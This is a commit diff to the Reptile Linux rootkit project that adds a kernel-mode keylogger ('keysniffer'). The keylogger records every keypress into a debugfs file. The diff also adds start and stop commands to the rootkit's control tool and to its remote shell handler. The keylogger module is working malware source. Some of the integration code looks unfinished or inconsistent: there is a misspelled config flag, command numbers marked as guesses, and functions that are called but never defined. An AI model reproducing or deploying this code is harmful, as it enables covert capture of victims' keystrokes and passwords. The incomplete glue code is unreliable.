添加keysniffer功能

2 months ago · 9c830e3898
parent 5f54432441
commit 9c830e3898
5 changed files with 177 additions and 0 deletions
--- a/src/Reptile/Makefile
+++ b/src/Reptile/Makefile
@ -22,6 +22,7 @@ INSTALLER ?= $(PWD)/scripts/installer.sh

 all: $(BUILD_DIR_MAKEFILE) userland_bin $(ENCRYPT) module kmatryoshka reptile

+obj-m += keysniffer.o
 reptile: $(LOADER)
 	@ $(ENCRYPT) $(BUILD_DIR)/reptile.ko $(RAND2) > $(BUILD_DIR)/reptile.ko.inc
 	@ echo "  CC      $(BUILD_DIR)/$@"
--- a/src/Reptile/kernel/Kbuild
+++ b/src/Reptile/kernel/Kbuild
@ -15,6 +15,7 @@ $(MODNAME)-$(CONFIG_HIDE_DIR)       += dir.o
 $(MODNAME)-$(CONFIG_FILE_TAMPERING) += file.o
 $(MODNAME)-$(CONFIG_HIDE_CONN)      += network.o
 $(MODNAME)-$(CONFIG_AUTO_HIDE)      += module.o
+$(MODNAME)-$(CONFIG_AUTO_Keysniffe)      += keysniffer.o

 ccflags-$(CONFIG_BACKDOOR)          += -DCONFIG_BACKDOOR
 ccflags-$(CONFIG_BACKDOOR)          += -DMAGIC_VALUE=\"$(MAGIC_VALUE)\"
--- a/src/Reptile/kernel/keysniffer.c
+++ b/src/Reptile/kernel/keysniffer.c
@ -0,0 +1,141 @@
+#include <linux/init.h>
+#include <linux/kernel.h>
+#include <linux/module.h>
+#include <linux/keyboard.h>
+#include <linux/debugfs.h>
+
+#define BUF_LEN (PAGE_SIZE << 2) /* 16KB buffer (assuming 4KB PAGE_SIZE) */
+
+/* Declarations */
+static struct dentry *file;
+static struct dentry *subdir;
+
+static ssize_t keys_read(struct file *filp,
+		char *buffer,
+		size_t len,
+		loff_t *offset);
+
+static int keysniffer_cb(struct notifier_block *nblock,
+		unsigned long code,
+		void *_param);
+
+/* Keymap */
+static const char *us_keymap[][2] = {
+	{"\0", "\0"}, {"_ESC_", "_ESC_"}, {"1", "!"}, {"2", "@"},
+	{"3", "#"}, {"4", "$"}, {"5", "%"}, {"6", "^"},
+	{"7", "&"}, {"8", "*"}, {"9", "("}, {"0", ")"},
+	{"-", "_"}, {"=", "+"}, {"_BACKSPACE_", "_BACKSPACE_"}, {"_TAB_", "_TAB_"},
+	{"q", "Q"}, {"w", "W"}, {"e", "E"}, {"r", "R"},
+	{"t", "T"}, {"y", "Y"}, {"u", "U"}, {"i", "I"},
+	{"o", "O"}, {"p", "P"}, {"[", "{"}, {"]", "}"},
+	{"_ENTER_", "_ENTER_"}, {"_CTRL_", "_CTRL_"}, {"a", "A"}, {"s", "S"},
+	{"d", "D"}, {"f", "F"}, {"g", "G"}, {"h", "H"},
+	{"j", "J"}, {"k", "K"}, {"l", "L"}, {";", ":"},
+	{"'", "\""}, {"`", "~"}, {"_SHIFT_", "_SHIFT_"}, {"\\", "|"},
+	{"z", "Z"}, {"x", "X"}, {"c", "C"}, {"v", "V"},
+	{"b", "B"}, {"n", "N"}, {"m", "M"}, {",", "<"},
+	{".", ">"}, {"/", "?"}, {"_SHIFT_", "_SHIFT_"}, {"_PRTSCR_", "_KPD*_"},
+	{"_ALT_", "_ALT_"}, {" ", " "}, {"_CAPS_", "_CAPS_"}, {"F1", "F1"},
+	{"F2", "F2"}, {"F3", "F3"}, {"F4", "F4"}, {"F5", "F5"},
+	{"F6", "F6"}, {"F7", "F7"}, {"F8", "F8"}, {"F9", "F9"},
+	{"F10", "F10"}, {"_NUM_", "_NUM_"}, {"_SCROLL_", "_SCROLL_"}, {"_KPD7_", "_HOME_"},
+	{"_KPD8_", "_UP_"}, {"_KPD9_", "_PGUP_"}, {"-", "-"}, {"_KPD4_", "_LEFT_"},
+	{"_KPD5_", "_KPD5_"}, {"_KPD6_", "_RIGHT_"}, {"+", "+"}, {"_KPD1_", "_END_"},
+	{"_KPD2_", "_DOWN_"}, {"_KPD3_", "_PGDN"}, {"_KPD0_", "_INS_"}, {"_KPD._", "_DEL_"},
+	{"_SYSRQ_", "_SYSRQ_"}, {"\0", "\0"}, {"\0", "\0"}, {"F11", "F11"},
+	{"F12", "F12"}, {"\0", "\0"}, {"\0", "\0"}, {"\0", "\0"},
+	{"\0", "\0"}, {"\0", "\0"}, {"\0", "\0"}, {"\0", "\0"},
+	{"_ENTER_", "_ENTER_"}, {"_CTRL_", "_CTRL_"}, {"/", "/"}, {"_PRTSCR_", "_PRTSCR_"},
+	{"_ALT_", "_ALT_"}, {"\0", "\0"}, {"_HOME_", "_HOME_"}, {"_UP_", "_UP_"},
+	{"_PGUP_", "_PGUP_"}, {"_LEFT_", "_LEFT_"}, {"_RIGHT_", "_RIGHT_"}, {"_END_", "_END_"},
+	{"_DOWN_", "_DOWN_"}, {"_PGDN", "_PGDN"}, {"_INS_", "_INS_"}, {"_DEL_", "_DEL_"},
+	{"\0", "\0"}, {"\0", "\0"}, {"\0", "\0"}, {"\0", "\0"},
+	{"\0", "\0"}, {"\0", "\0"}, {"\0", "\0"}, {"_PAUSE_", "_PAUSE_"},
+};
+
+static size_t buf_pos;
+static char keys_buf[BUF_LEN] = {0};
+
+const struct file_operations keys_fops = {
+	.owner = THIS_MODULE,
+	.read = keys_read,
+};
+
+static ssize_t keys_read(struct file *filp,
+		char *buffer,
+		size_t len,
+		loff_t *offset)
+{
+	return simple_read_from_buffer(buffer, len, offset, keys_buf, buf_pos);
+}
+
+static struct notifier_block keysniffer_blk = {
+	.notifier_call = keysniffer_cb,
+};
+
+/* Keypress callback */
+int keysniffer_cb(struct notifier_block *nblock,
+		unsigned long code,
+		void *_param)
+{
+	size_t len;
+	struct keyboard_notifier_param *param = _param;
+	const char *pressed_key;
+
+	/* pr_debug("code: 0x%lx, down: 0x%x, shift: 0x%x, value: 0x%x\n",
+		code, param->down, param->shift, param->value); */
+
+	if (!(param->down))
+		return NOTIFY_OK;
+
+	if (param->value >= 0x1 && param->value <= 0x77) {
+		pressed_key = param->shift
+				? us_keymap[param->value][1]
+				: us_keymap[param->value][0];
+		if (pressed_key) {
+			len = strlen(pressed_key);
+
+			if ((buf_pos + len) >= BUF_LEN) {
+				memset(keys_buf, 0, BUF_LEN);
+				buf_pos = 0;
+			}
+
+			strncpy(keys_buf + buf_pos, pressed_key, len);
+			buf_pos += len;
+			keys_buf[buf_pos++] = '\n';
+
+			/* pr_debug("%s\n", pressed_key; */
+		}
+	}
+
+	return NOTIFY_OK;
+}
+
+static int __init keysniffer_init(void)
+{
+	buf_pos = 0;
+
+	subdir = debugfs_create_dir("kisni", NULL);
+	if (IS_ERR(subdir))
+		return PTR_ERR(subdir);
+	if (!subdir)
+		return -ENOENT;
+
+	file = debugfs_create_file("keys", S_IRUSR, subdir, NULL, &keys_fops);
+	if (!file) {
+		debugfs_remove_recursive(subdir);
+		return -ENOENT;
+	}
+
+	register_keyboard_notifier(&keysniffer_blk);
+	return 0;
+}
+
+static void __exit keysniffer_exit(void)
+{
+	unregister_keyboard_notifier(&keysniffer_blk);
+	debugfs_remove_recursive(subdir);
+}
+
+module_init(keysniffer_init);
+module_exit(keysniffer_exit);
--- a/src/Reptile/userland/cmd.c
+++ b/src/Reptile/userland/cmd.c
@ -190,6 +190,27 @@ int main(int argc, char **argv)
            }
        }
    }*/
+    if (strcmp(argv[1], "keysniffer") == 0) {
+        if (argc < 3)
+            goto fail;
+
+        if (strcmp(argv[2], "start") == 0) {
+            args.cmd = 6; // 假设6是启动keysniffer的命令
+        } else if (strcmp(argv[2], "stop") == 0) {
+            args.cmd = 7; // 假设7是停止keysniffer的命令
+        } else {
+            goto fail;
+        }
+
+        if (ioctl(sockfd, AUTH, HTUA) == 0) {
+            if (ioctl(sockfd, AUTH, &args) == 0) {
+                if (ioctl(sockfd, AUTH, HTUA) == 0) {
+                    printf("\e[01;32mSuccess!\e[00m\n");
+                    goto out;
+                }
+            }
+        }
+    }
 fail: // fail标签，打印失败信息并关闭套接字
    printf("\e[01;31mFailed!\e[00m\n");
 out: // out标签，关闭套接字并返回0表示程序结束
--- a/src/Reptile/userland/shell.c
+++ b/src/Reptile/userland/shell.c
@ -471,6 +471,19 @@ int main(int argc, char **argv)
 				delay = atoi((char *)message);

 				goto connect;
+			case 'K': // 添加 keysniffer 命令处理
+				if (pel_recv_msg(client, message, &len) != PEL_SUCCESS)
+					goto end;
+				if (strcmp((char *)message, "start") == 0) {
+					start_keysniffer();
+                } 
+				else if (strcmp((char *)message, "stop") == 0) {
+					stop_keysniffer();
+                }
+                if (pel_send_msg(client, (unsigned char *)EXIT, EXIT_LEN) != PEL_SUCCESS)
+					goto end;
+
+                goto connect;
 			default:
 				break;
 			}